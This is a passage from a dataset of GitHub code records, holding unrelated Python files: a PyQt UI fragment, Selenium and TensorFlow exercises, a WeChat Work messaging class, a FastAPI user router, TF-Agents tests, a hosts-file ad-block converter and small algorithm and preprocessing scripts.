self.textBrowser_12.setText(\"...........\")\r\n break\r\n while a<=10:\r\n self.textList[a].setText(\"\")\r\n a+=1\r\n else:\r\n ns=rx.getNodeBySick(rx.input_str)\r\n ls=rx.getPrescription(rx.input_str)\r\n for n in ns:\r\n str=ls[a]\r\n self.textList[a].setText(\"\" +str+ \"\")\r\n # print(n.getAttribute('name'))\r\n # rx.getPrescription(rx.input_str)\r\n # self.textList[a].setText(\"\"+a+\"\")\r\n a += 1\r\n if a==len(ls):\r\n break\r\n elif a==11:\r\n self.textBrowser_12.setText(\"...........\")\r\n break\r\n while a<=10:\r\n self.textList[a].setText(\"\")\r\n a+=1\r\n\r\nif __name__=='__main__':\r\n app=QApplication(sys.argv)\r\n mw=mainWindow()\r\n ch=Child()\r\n movie = QtGui.QMovie(\"res/pc.gif\")\r\n mw.label_2.setMovie(movie)\r\n mw.show()\r\n movie.start()\r\n\r\n mw.detail.clicked.connect(ch.open)\r\n sys.exit(app.exec_())","repo_name":"Hush-Lee/health-scroll","sub_path":"venv/Include/mainWindow.py","file_name":"mainWindow.py","file_ext":"py","file_size_in_byte":4756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38861754025","text":"import time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nbrowser = webdriver.Chrome()\n\nbrowser.get(\"https://techstepacademy.com/training-ground\")\n\ninput2_css_locator = \"input[id='ipt2']\"\nbutn4_xpath_locator = \"//button[@id='b4']\"\n\n# Assign elements\ninput1_elem = browser.find_element(By.CSS_SELECTOR, input2_css_locator)\nbutn4_elem = browser.find_element(By.XPATH, butn4_xpath_locator)\n\n# Manipulate elements\ninput1_elem.send_keys(\"Test text\")\nbutn4_elem.click()\n\n# Wait for 20 seconds\ntime.sleep(20)\nbrowser.quit()","repo_name":"dmshd/Python3_Drills","sub_path":"beautiful_browser_automation/beautiful_browser_automation/elements_exercise.py","file_name":"elements_exercise.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36963824440","text":"import data\nimport numpy as np\nimport ratings_plot\nimport matplotlib.pyplot as plt\n\ninputs = [data.listings_amenities,data.listings_accommodates,data.listings_bedrooms,data.listings_beds,data.listings_price]\ninputs,outputs = data.pop_nans(inputs,data.scores_value)\n\n#convert money to float\nfor i in inputs[4].keys():\n inputs[4][i] = float(inputs[4][i].strip(\"$\").replace(',', ''))\n if inputs[4][i] > 2000:\n inputs[4][i] = 181.8111094043352 #mean\n\n#Use number of amenities instead of amenities themselves\nfor i in inputs[0].keys():\n inputs[0][i] = inputs[0][i].count(',')\n\nratings_plot.plot_3d(inputs[2],inputs[4],outputs,\"#Bedrooms\",\"Price\",\"Value\",\"Value Rating vs Price & #Bedrooms\")\n\nX=np.column_stack((inputs[0]*inputs[4],inputs[1]*inputs[4],inputs[2]*inputs[4],inputs[3]*inputs[4]))\n\nfrom sklearn.linear_model import LinearRegression\n\nmodel = LinearRegression()\nmodel.fit(X, outputs)\n\nprint(model.intercept_)\nprint(model.coef_)","repo_name":"james-lunt/AirBnB-Rating-Predictor","sub_path":"value.py","file_name":"value.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7812353708","text":"import math\r\n\r\n\r\ndef isprime(n):\r\n for j in range(2, int(math.sqrt(n) + 1)):\r\n if n % j == 0:\r\n return False\r\n return True\r\n\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n while True:\r\n if n == 0 or n == 1:\r\n print(2)\r\n break\r\n if 
isprime(n):\r\n            print(n)\r\n            break\r\n        n +=1","repo_name":"shotgun1107/coding-test","sub_path":"백준/Silver/4134. 다음 소수/다음 소수.py","file_name":"다음 소수.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17102153128","text":"#!/usr/bin/env python3\n# Send messages through a WeChat Work (WeCom) self-built app.\n# Date: 2020-12-01\n\nimport requests\nimport sys\nimport os\nimport json\n\nclass WxWorkAPPError(RuntimeError):\n    def __init__(self, arg):\n        self.args = arg\n\n\nclass WxWorkAPP:\n    # enterprise (corp) ID\n    corpid = ''\n\n    # secret of the self-built app\n    appsecret = ''\n\n    # agentid of the self-built app\n    agentid = 1000002\n\n    def __init__(self):\n        pass\n\n    # Set the information needed for sending messages: the corp ID (_corpid), the app secret (_appsecret) and the agentid (_agentid) of the self-built app\n    @classmethod\n    def setsetting(self, _corpid, _appsecret, _agentid):\n        self.corpid = _corpid\n        self.appsecret = _appsecret\n        self.agentid = _agentid\n\n    # Send a message: recipients (ToUser), target departments (ToParty) and the message body (Message). At least one of ToUser and ToParty must be valid, and the message must not be empty.\n    @classmethod\n    def sendmessage(self, ToUser, ToParty, Message):\n        # fetch the access token\n        token_url = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=' + self.corpid + '&corpsecret=' + self.appsecret\n        req = requests.get(token_url)\n        if(req.status_code != 200):\n            raise WxWorkAPPError(\"WxWorkAPP Request AccessToken Error\")\n\n        accesstoken_json=req.json();\n        accesstoken=''\n        if('access_token' in accesstoken_json):\n            accesstoken = req.json()['access_token']\n        else:\n            raise WxWorkAPPError(\"wxWorkAPP Get AccessToken Error\")\n\n        # send the message\n        msgsend_url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=' + accesstoken + '&debug=1'\n        params = {\n            \"touser\": ToUser,\n            \"toparty\": ToParty,\n            \"msgtype\": \"text\",\n            \"agentid\": self.agentid,\n            \"text\": {\n                \"content\": Message\n            },\n            \"safe\": 0\n        }\n        req = requests.post(msgsend_url, data=json.dumps(params))\n        if(req.status_code != 200):\n            raise WxWorkAPPError(\"WxWorkAPP Request SendMessage Error\")\n        ret = json.loads(req.text)\n        if(ret['errcode'] != 0):\n            raise WxWorkAPPError('WxWorkAPP SendMessage Error:'+req.text)\n","repo_name":"HEYAHONG/HYH_BlogAndNote","sub_path":"脚本相关/python脚本/使用企业微信自建应用API发送消息/WxWorkAPP/WxWorkAPP.py","file_name":"WxWorkAPP.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42246825908","text":"# -*- coding:utf-8 -*-\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n# only disables the AVX Warning\n\n#\n# Implement various loss functions with Tensorflow\n#\n#\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\nsess = tf.Session()\n# create a session\n\n# first: loss functions for regression\n\n# create the prediction and target sequences as tensors\nx_vals = tf.linspace(-1., 1., 500)\ntarget = tf.constant(0.)\n\n\n# 1. L2 loss (Euclidean loss)\nl2_y_vals = tf.square(target - x_vals)\nl2_y_out = sess.run(l2_y_vals)\n\n# same as (t1-x1)^2 + .... +(tn-xn)^2\n# Tensorflow's built-in L2 form: nn.l2_loss() = 1/2 * l2_y_vals\n\n\n# 2. L1 loss (absolute-value loss)\nl1_y_vals = tf.abs(target - x_vals)\nl1_y_out = sess.run(l1_y_vals)\n# same as |t1-x1| + .... +|tn-xn|\n\n\n# 3. Pseudo-Huber loss\ndelta1 = tf.constant(0.25)\nphuber1_y_vals = tf.multiply(tf.square(delta1), tf.sqrt(1. + tf.square((target - x_vals)/delta1)) - 1.)\nphuber1_y_out = sess.run(phuber1_y_vals)\n\ndelta2 = tf.constant(5.)\nphuber2_y_vals = tf.multiply(tf.square(delta2), tf.sqrt(1. 
+ tf.square((target - x_vals)/delta2)) - 1.)\nphuber2_y_out = sess.run(phuber2_y_vals)\n\n\nx_vals = tf.linspace(-3., 5., 500)\ntarget = tf.constant(1.)\n# targets = tf.fill([500,], 1.)\n\n\n# 4. Hinge loss\nhinge_y_vals = tf.maximum(0., 1. - tf.multiply(target, x_vals))\nhinge_y_out = sess.run(hinge_y_vals)\n# mainly used to evaluate support vector machine algorithms\n# here the target value is 1; the closer the prediction is to 1, the smaller the loss\n\n\n\n# 5. Cross-entropy loss for two classes (logistic loss)\nxentropy_y_vals = - tf.multiply(target, tf.log(x_vals)) - tf.multiply((1. - target), tf.log(1. - x_vals))\nxentropy_y_out = sess.run(xentropy_y_vals)\n# same as -(t * log(x)) - [(1 - t) * log(1 - x)]\n\n\n# x_vals = tf.linspace(-3., 5., 500)\n# target = tf.constant(1.)\ntargets = tf.fill([500,], 1.)\n\n# 6. Sigmoid cross-entropy loss\nxentropy_sigmoid_vals = tf.nn.sigmoid_cross_entropy_with_logits(logits=x_vals, labels=targets)\nxentropy_sigmoid_out = sess.run(xentropy_sigmoid_vals)\n# first pass x_vals through a sigmoid, then compute the cross-entropy loss\n\n\n# 7. Weighted cross-entropy loss\nweight = tf.constant(0.5)\nxentropy_weighted_y_vals = tf.nn.weighted_cross_entropy_with_logits(targets, x_vals, weight)\nxentropy_weighted_y_out = sess.run(xentropy_weighted_y_vals)\n# a weighted version of the sigmoid cross-entropy loss; the positive targets are weighted\n\n\n# 8. Softmax cross-entropy loss\nunscaled_logits = tf.constant([[1., -3., 10.]])\ntarget_dist = tf.constant([[0.1, 0.02, 0.88]])\nsoftmax_xentropy = tf.nn.softmax_cross_entropy_with_logits_v2(labels=target_dist, logits=unscaled_logits)\nprint(sess.run(softmax_xentropy))\n\n# computes the loss for a single target distribution; softmax turns the outputs into a probability distribution\n\n\n# 9. Sparse softmax cross-entropy loss\nunscaled_logits = tf.constant([[1., -3., 10.]])\nsparse_target_dist = tf.constant([2])\nsparse_xentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=unscaled_logits, labels=sparse_target_dist)\nprint(sess.run(sparse_xentropy))\n# the true target class is passed as an index instead of a one-hot vector\n\n\n\nprint('----------------------')\n\n# plot the regression loss functions with matplotlib\n\n# part1\n\n# x_array = sess.run(x_vals)\n# plt.plot(x_array, l2_y_out, 'b-', label='L2 Loss')\n# plt.plot(x_array, l1_y_out, 'r--', label='L1 Loss')\n# plt.plot(x_array, phuber1_y_out, 'k-.', label='P-Huber Loss (0.25)')\n# plt.plot(x_array, phuber2_y_out, 'g:', label='P-Huber Loss (5.0)')\n# plt.ylim(-0.2, 0.4)\n# plt.legend(loc='lower right', prop={'size': 11})\n# plt.show()\n\n\n\n# part2\nx_array = sess.run(x_vals)\nplt.plot(x_array, hinge_y_out, 'b-', label='Hinge Loss')\nplt.plot(x_array, xentropy_y_out, 'r--', label='Cross-entropy loss')\nplt.plot(x_array, xentropy_sigmoid_out, 'k-.', label='Cross-entropy sigmoid loss')\nplt.plot(x_array, xentropy_weighted_y_out, 'g:', label='Weighted Cross-entropy loss')\nplt.ylim(-1.5, 3)\nplt.legend(loc='lower right', prop={'size': 11})\nplt.show()\n\n\n\n\n\n","repo_name":"skylinebin/Machine-Learning-Notes","sub_path":"Tensorflow/TensorflowWithCookbook/MachineLearningThree.py","file_name":"MachineLearningThree.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23076712884","text":"def ns(f):\n    return next(f).strip()\n\n\nwith open(\"../testset/duplicate_combinations/test1.txt\", 'r') as f:\n    n, m, M = map(int, ns(f).split())\n    a = list(map(int, ns(f).split()))\n\ndp = [[1] + [0] * m for _ in range(n + 1)]\n\nfor i in range(n):\n    for j in range(1, m + 1):\n        if j - 1 - a[i] >= 0:\n            dp[i + 1][j] = (dp[i + 1][j - 1] + dp[i][j] - dp[i][j - 1 - a[i]] + M) % M\n        else:\n            dp[i + 1][j] = (dp[i + 1][j - 1] + dp[i][j]) % 
M\nprint(dp[n][m])\n","repo_name":"e5pe0n/algorithm-training","sub_path":"Ant/chapter2/python/duplicate_combinations.py","file_name":"duplicate_combinations.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33675754138","text":"from fastapi import APIRouter\nfrom fastapi.encoders import jsonable_encoder\nfrom pymongo import message\nfrom database.db import UserSchema,UserDB\nfrom routers.utils import ResponseModel, ErrorResponseModel\n\nrouter = APIRouter()\nuser_col = UserDB()\n\n#CREATE\n@router.post(\"/users/\")\nasync def api_add_user(data: UserSchema) -> dict:\n    \"\"\"\n    Add user to db\n    \"\"\"\n    data = jsonable_encoder(data)\n    new_user = user_col.add_user(data)\n    if new_user:\n        message = \"add success\"\n        code = 201\n        return ResponseModel(new_user, code, message)\n    return ErrorResponseModel(\"Failed\", 404)\n\n#READ\n@router.get(\"/users/{uid}\")\nasync def api_get_user_info(uid : str) -> dict:\n    \"\"\"\n    Get user from db\n    \"\"\"\n    user = user_col.get_user_info(uid)\n    if user:\n        message = \"Success\"\n        code = 200\n        return ResponseModel(user, code, message)\n    return ErrorResponseModel(\"Failed\", 404)\n\n#UPDATE\n@router.put(\"/users/{uid}\")\nasync def api_update_user(uid: str, data: UserSchema) -> dict:\n    \"\"\"\n    Update user in db\n    \"\"\"\n    data = jsonable_encoder(data)\n    is_update = user_col.update_user(uid,data)\n    if is_update:\n        message = \"Update Success\"\n        code = 200\n        return ResponseModel(is_update, code, message)\n    return ErrorResponseModel(\"Failed\", 404)\n\n#DELETE\n@router.delete(\"/users/{uid}\")\nasync def api_del_user(uid: str) -> dict:\n    \"\"\"\n    Delete user in db\n    \"\"\"\n    is_del = user_col.del_user(uid)\n    if is_del:\n        message = \"Delete Success\"\n        code = 200\n        return ResponseModel(is_del, code, message)\n    return ErrorResponseModel(\"Failed\",404)\n\n\n","repo_name":"phuthu19112000/demovfrandsize","sub_path":"routers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14296561052","text":"# This is a comment; this line will not be interpreted\n\n\"\"\"\nThis is \na multi-line Comment\nwill not be interpreted\n\"\"\"\n# How to declare Variables\n# in JavaScript: var variableName = value\n\n# python is snake_case: we are going to use the snake_case naming convention\n\nvariable_name = \"value\"\n\nGLOBAL_VARIABLE = \"python\"\n\nPORT = 5000\nAPP_NAME = \"WEB_APP\"\n\n# DATA TYPES\n\n#* Primitives\n    #* String\nfirst_str =\"hello world\"\nname=\"John\"\n    #* Numbers\n        #*integers\nage = 41\n        #*Floats\nbmi = 2.75\n    #* Boolean\nvoted = True\nis_admin= False\n    #* NoneType\npermit = None\n\n# print(name, age, bmi, is_admin)\n\n# print(f\"User name: {name} his {age} years and his BMI equal to {bmi}\")\n\n# print(f\"USER : {name} \\nBMI : {bmi}\")\n\n# print(\"FORMAT ** User name: {} his {} years and his BMI equal to {}\" .format(name, age, bmi))\n\n# print(f\"None :{type(permit)}\\nName : {type(name)} \\nAge :{type(age)} \\nBMI : {type(bmi)} \\nADMIN : {type(is_admin)}\")\n\nstr_age = str(age)\nfloat_age = float(age)\n# print(f\"AGE : {type(age)} \\nSTR_AGE {type(str_age)} \\nFLOAT_AGE{type(float_age)} {float_age}\")\n\n# print(len(name), name.upper(), first_str.split(' '))\n\n\n# * COMPLEX LISTS\n\n# Array in JavaScript == List in Python\n# INDEX 0------->len(list)-1\n\nmy_list = [1,2,3,\"45\",4,5, name, age, is_admin, bmi, [\"yes\", \"no\", None]]\n\n# 
print(my_list[0])\n\n# print(my_list[0:5])\n\n# print(my_list)\n# my_list.append(first_str)\n# print(my_list)\n# my_list.pop()\n# print(my_list)\n# my_list.pop(-2)\n\n# numbers = [2,0,22,5,-11,100]\n# numbers.sort(reverse=True)\n# print(numbers)\n\n# * COMPLEX JavaScript OBJECTS = (PYTHON Dictionaries)\n# * Key-Value PAIRS\nuser = {\n    'first_name' : name,\n    'last-name' : \"smith\",\n    'age' : age,\n    'is_admin' : False,\n    'marks' : [10,9,8,10],\n    'friends' : {'one' : \"Alex\" , 'two' : \"Max\"}\n}\n\n# bracket notation\nprint(user[\"first_name\"])\n# .get Notation\nprint(user.get(\"is_admin\"))\n\nuser[\"is_admin\"] = True\nprint(user)\n\n# * Tuples ( Similar to lists BUT immutable : Can NOT be changed)\n\nmy_tuple =(1,2,3)\nmy_tuple.append(4)\n\n# * SETS\nmy_set = {1,2,2,3,4,5,5,6,\"john\",\"john\"}\nprint(my_set)","repo_name":"wissemlabidi/python-stack","sub_path":"01-python-fundamentals/01_data_types.py","file_name":"01_data_types.py","file_ext":"py","file_size_in_byte":2085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31157330408","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\n\nfrom absl.testing import parameterized\nimport numpy as np\nimport tensorflow as tf  # pylint: disable=g-explicit-tensorflow-version-import\n\nfrom tf_agents.agents.ddpg import actor_network\nfrom tf_agents.environments import random_py_environment\nfrom tf_agents.policies import actor_policy\nfrom tf_agents.policies import policy_saver\nfrom tf_agents.policies import py_tf_eager_policy\nfrom tf_agents.policies import random_tf_policy\nfrom tf_agents.specs import array_spec\nfrom tf_agents.specs import tensor_spec\nfrom tf_agents.trajectories import time_step as ts\nfrom tf_agents.utils import common\nfrom tf_agents.utils import nest_utils\nfrom tf_agents.utils import test_utils\n\n\nclass PyTFEagerPolicyTest(test_utils.TestCase):\n\n  def testPyEnvCompatible(self):\n    if not common.has_eager_been_enabled():\n      self.skipTest('Only supported in eager.')\n\n    observation_spec = array_spec.ArraySpec([2], np.float32)\n    action_spec = array_spec.BoundedArraySpec([1], np.float32, 2, 3)\n\n    observation_tensor_spec = tensor_spec.from_spec(observation_spec)\n    action_tensor_spec = tensor_spec.from_spec(action_spec)\n    time_step_tensor_spec = ts.time_step_spec(observation_tensor_spec)\n\n    actor_net = actor_network.ActorNetwork(\n        observation_tensor_spec,\n        action_tensor_spec,\n        fc_layer_params=(10,),\n    )\n\n    tf_policy = actor_policy.ActorPolicy(\n        time_step_tensor_spec, action_tensor_spec, actor_network=actor_net)\n\n    py_policy = py_tf_eager_policy.PyTFEagerPolicy(tf_policy)\n    # Env will validate action types automatically since we provided the\n    # action_spec.\n    env = random_py_environment.RandomPyEnvironment(observation_spec,\n                                                    action_spec)\n\n    time_step = env.reset()\n\n    for _ in range(100):\n      action_step = py_policy.action(time_step)\n      time_step = env.step(action_step.action)\n\n  def testRandomTFPolicyCompatibility(self):\n    if not common.has_eager_been_enabled():\n      self.skipTest('Only supported in eager.')\n\n    observation_spec = array_spec.ArraySpec([2], np.float32)\n    action_spec = array_spec.BoundedArraySpec([1], np.float32, 2, 3)\n\n    observation_tensor_spec = tensor_spec.from_spec(observation_spec)\n    action_tensor_spec = tensor_spec.from_spec(action_spec)\n    time_step_tensor_spec = ts.time_step_spec(observation_tensor_spec)\n\n    tf_policy = 
random_tf_policy.RandomTFPolicy(time_step_tensor_spec,\n action_tensor_spec)\n\n py_policy = py_tf_eager_policy.PyTFEagerPolicy(tf_policy)\n env = random_py_environment.RandomPyEnvironment(observation_spec,\n action_spec)\n time_step = env.reset()\n\n for _ in range(100):\n action_step = py_policy.action(time_step)\n time_step = env.step(action_step.action)\n\n\nclass SavedModelPYTFEagerPolicyTest(test_utils.TestCase,\n parameterized.TestCase):\n\n def setUp(self):\n super(SavedModelPYTFEagerPolicyTest, self).setUp()\n if not common.has_eager_been_enabled():\n self.skipTest('Only supported in eager.')\n\n observation_spec = array_spec.ArraySpec([2], np.float32)\n self.action_spec = array_spec.BoundedArraySpec([1], np.float32, 2, 3)\n self.time_step_spec = ts.time_step_spec(observation_spec)\n\n observation_tensor_spec = tensor_spec.from_spec(observation_spec)\n action_tensor_spec = tensor_spec.from_spec(self.action_spec)\n time_step_tensor_spec = tensor_spec.from_spec(self.time_step_spec)\n\n actor_net = actor_network.ActorNetwork(\n observation_tensor_spec,\n action_tensor_spec,\n fc_layer_params=(10,),\n )\n\n self.tf_policy = actor_policy.ActorPolicy(\n time_step_tensor_spec, action_tensor_spec, actor_network=actor_net)\n\n def testSavedModel(self):\n\n path = os.path.join(self.get_temp_dir(), 'saved_policy')\n saver = policy_saver.PolicySaver(self.tf_policy)\n saver.save(path)\n\n eager_py_policy = py_tf_eager_policy.SavedModelPyTFEagerPolicy(\n path, self.time_step_spec, self.action_spec)\n rng = np.random.RandomState()\n sample_time_step = array_spec.sample_spec_nest(self.time_step_spec, rng)\n batched_sample_time_step = nest_utils.batch_nested_array(sample_time_step)\n\n original_action = self.tf_policy.action(batched_sample_time_step)\n unbatched_original_action = nest_utils.unbatch_nested_tensors(\n original_action)\n original_action_np = tf.nest.map_structure(lambda t: t.numpy(),\n unbatched_original_action)\n saved_policy_action = eager_py_policy.action(sample_time_step)\n\n tf.nest.assert_same_structure(saved_policy_action.action, self.action_spec)\n\n np.testing.assert_array_almost_equal(original_action_np.action,\n saved_policy_action.action)\n\n @parameterized.parameters(None, 0, 100, 200000)\n def testGetTrainStep(self, train_step):\n path = os.path.join(self.get_temp_dir(), 'saved_policy')\n if train_step is None:\n # Use the default argument, which should set the train step to be -1.\n saver = policy_saver.PolicySaver(self.tf_policy)\n expected_train_step = -1\n else:\n saver = policy_saver.PolicySaver(\n self.tf_policy, train_step=tf.constant(train_step))\n expected_train_step = train_step\n saver.save(path)\n\n eager_py_policy = py_tf_eager_policy.SavedModelPyTFEagerPolicy(\n path, self.time_step_spec, self.action_spec)\n\n self.assertEqual(expected_train_step, eager_py_policy.get_train_step())\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"awilliea/Risk-based_RL_for_Optimal_Trading_Execution","sub_path":"tf_agents/policies/py_tf_eager_policy_test.py","file_name":"py_tf_eager_policy_test.py","file_ext":"py","file_size_in_byte":5749,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"72"} +{"seq_id":"37541321709","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\n__author__ = 'ballessay'\n\nfrom glob import glob\nimport os\nimport sys\nimport getopt\n\n################################################################################\n# sources must be manually downloaded cause automation 
is forbidden by most\n# of the services\n#\n# http://winhelp2002.mvps.org/hosts.txt\n# http://hosts-file.net/download/hosts.txt\n# http://pgl.yoyo.org/adservers/serverlist.php?hostformat=dnsmasq&showintro=0&mimetype=plaintext\n# http://someonewhocares.org/hosts/hosts\n#\n# manual download helper script: DownloadHostsFiles.sh\n\n\n# Some input hosts files are a bit too restrictive. So the entries in\n# this list won't be included in the output file\n_url_filter = [\n \"blogspot.com\"\n]\n\n# output formats\n_dnsmasq_format = 'address=/{0}/127.0.0.1'.format\n_hosts_file_format = '127.0.0.1 {0}'.format\n_unbound_format = 'local-zone: \"{0}\" redirect\\nlocal-data: \"{0} A 127.0.0.1\"'.format\n\n\ndef relevant(line):\n \"\"\"\n Check if a line even needs to be considered for parsing\n :param line: to inspect\n :return: True/False\n \"\"\"\n return not line.startswith('#') and len(line) > 0 and not line.isspace()\n\n\ndef url_part(parts):\n \"\"\"\n Depending on the element count return the url/domain part in of the list\n :param parts: list with the parts of a split line as elements\n :return: domain name or None\n \"\"\"\n elements = len(parts)\n if elements > 1:\n return parts[1]\n elif elements > 0:\n return parts[0]\n return None\n\n\nclass HostsConverter:\n # info message per file\n _file_info = 'file: {0} has {1} lines, relevant: {2} split: {3} ' \\\n 'unfiltered lines {4}'.format\n\n # message string to display at the end of extraction\n _extract_msg = 'overall line count {0}\\nunique unfiltered ' \\\n 'domains: {1}'.format\n\n def __init__(self, path, output_format, output_file, print_stats):\n self._working_dir = path\n self._domains = set()\n self._line_count = 0\n self._output_format = output_format\n self._print_stats = print_stats\n self._output_file = output_file\n\n def convert(self):\n \"\"\"\n Convert/Merge all files in file_paths to one big host/dnsmasq file and\n output some statistics at the end\n \"\"\"\n print('working dir: {0}'.format(self._working_dir))\n\n file_paths = glob(os.path.join(self._working_dir, '*.hosts'))\n for filename in file_paths:\n self._parse_file(filename)\n\n self._write_file()\n\n if self._print_stats:\n print(self._extract_msg(self._line_count, len(self._domains)))\n\n def _write_file(self):\n \"\"\"\n Writes the collected DNS entries to an output file\n \"\"\"\n file_path = os.path.join(self._working_dir, self._output_file)\n with open(file_path, 'w') as output_file:\n for domain in self._domains:\n output_file.write(self._output_format(domain) + '\\n')\n output_file.close()\n\n def _parse_file(self, file_path):\n \"\"\"\n Parse one file for domain names and output some file statistics\n :param file_path: path to the input file\n \"\"\"\n line_count = 0\n relevant_lines = 0\n url_count = 0\n added_urls = 0\n\n with open(file_path, 'r') as input_file:\n for line in input_file:\n line_count += 1\n if relevant(line):\n relevant_lines += 1\n url = url_part(line.split())\n if url:\n url_count += 1\n if url not in _url_filter:\n added_urls += 1\n self._domains.add(url)\n\n if self._print_stats:\n print(self._file_info(file_path, line_count, relevant_lines,\n url_count, added_urls))\n\n self._line_count += line_count\n input_file.close()\n\n\ndef usage():\n # TODO: print nice formatted usage information\n print('Usage: {0}'.format(os.path.basename(sys.argv[0])))\n print('Options:')\n print('-h, --help shows this information')\n print('-o, --output filename sets the name of the output file. default: ' \\\n 'hosts_out')\n print('-p, --path working dir. 
default: cwd/pwd')\n print('-f, --format output file format. possible: hosts, dnsmasq, unbound' \\\n ' default: dnsmasq')\n print('-s, --stats shows some file statistics')\n\n\ndef main(argv):\n path = os.getcwd()\n format_type = 'dnsmasq'\n output_format = _dnsmasq_format\n output_file = \"hosts.out\"\n print_stats = False\n\n _options_short = 'ho:p:f:s'\n _options_long = ['help', 'output=', 'path=', 'format=', 'stats']\n\n try:\n opts, args = getopt.getopt(argv, _options_short, _options_long)\n except getopt.GetoptError as err:\n print(err.message)\n usage()\n sys.exit(2)\n\n for opt, arg in opts:\n if opt in ('-h', '--help'):\n usage()\n sys.exit()\n elif opt in ('-o', '--output'):\n output_file = arg\n elif opt in ('-p', '--path'):\n path = arg\n elif opt in ('-f', '--format'):\n format_type = arg\n elif opt in ('-s', '--stats'):\n print_stats = True\n\n formats = {'hosts': _hosts_file_format, 'dnsmasq': _dnsmasq_format, 'unbound': _unbound_format}\n if format_type in formats.keys():\n output_format = formats[format_type]\n else:\n usage()\n sys.exit(3)\n\n converter = HostsConverter(path, output_format, output_file, print_stats)\n converter.convert()\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"ballessay/hostsfileconverter","sub_path":"HostsFileConverter.py","file_name":"HostsFileConverter.py","file_ext":"py","file_size_in_byte":5793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35676417517","text":"# Given an array of integers, return indices of the two numbers such that they add up to a specific target.\n#\n# You may assume that each input would have exactly one solution, and you may not use the same element twice.\n#\n# Example:\n# Given nums = [2, 7, 11, 15], target = 9,\n#\n# Because nums[0] + nums[1] = 2 + 7 = 9,\n# return [0, 1].\n\ndef twoSum(nums,target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n since we may not use the same element twice, so at most we could loop the list one time.\n foreach element we need to know if there is another element exist in the list can sum up to target.\n we can't have the second loop to sum therefor each element will be use n-1 times.\n so we switch to use a Dict which the key is the element itself,and value is the index.\n and we just need to check if the dict contains the key(target -nums[i]).\n \"\"\"\n dict = {}\n for index in range(len(nums)):\n if target - nums[index] in dict:\n perv = dict[target - nums[index]]\n return [perv,index]\n else:\n dict[nums[index]] = index\n\nprint(twoSum([2,7,11,15],9))\n","repo_name":"paulhzq/leetcode","sub_path":"1_two_sum.py","file_name":"1_two_sum.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69946775273","text":"\"\"\"\r\nHW3: preprocess\r\nYuwei Zhang\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n\r\ndef create_outcome(df, post_col, funded_col, interval_col, outcome_col, period):\r\n '''\r\n Define the outcome column\r\n :param df: a data frame\r\n :param post_col: (str) the name of the posted date\r\n :param funded_col: (str) the name of the funded date\r\n :param interval_col: (str) the name of the interval\r\n :param outcome_col: (str) the name of the outcome column\r\n :param period: (timedelta object) the period that the project receive funding\r\n\r\n :return: No returns but add three two columns\r\n '''\r\n\r\n df[post_col] = 
pd.to_datetime(df[post_col])\r\n    df[funded_col] = pd.to_datetime(df[funded_col])\r\n    df[interval_col] = df[funded_col] - df[post_col]\r\n    df[outcome_col] = np.where(df[interval_col] <= period, 1, 0)\r\n\r\n\r\ndef imputation(df, colnames, is_num=True):\r\n    '''\r\n    Impute the cells that are NaN with an intended value. If the column is numeric, the\r\n    imputed value is its mean; otherwise it is 'unknown'.\r\n    :param df: a data frame\r\n    :param colnames: (list) a list of column names to be imputed\r\n    :param is_num: (bool) check whether those columns are numeric or not\r\n\r\n    :return: No returns.\r\n    '''\r\n\r\n    for colname in colnames:\r\n        if is_num:\r\n            impute_val = df[colname].mean()\r\n        else:\r\n            impute_val = 'unknown'\r\n\r\n        df[colname] = df[colname].fillna(value=impute_val)\r\n\r\n\r\ndef discritize(df, colname, bins_list, labels_list):\r\n    '''\r\n    Discretize a continuous variable\r\n    Inputs:\r\n        df: a data frame\r\n        colname: the name of the column\r\n        bins_list: the list of the boundaries to be cut\r\n        labels_list: the labels of the resulting bins\r\n    Output:\r\n        adds a new column discretized from the continuous variable\r\n    '''\r\n    df[(colname + '_category')] = pd.cut(df[colname],\r\n                                         bins=bins_list,\r\n                                         labels=labels_list,\r\n                                         include_lowest=True, right=False)\r\n\r\n\r\ndef get_dummies(df, colname):\r\n    '''\r\n    Convert the categorical variable into dummies\r\n    Inputs:\r\n        df: a data frame\r\n        colname: the name of the column\r\n    Return:\r\n        the data frame with those dummies concatenated to 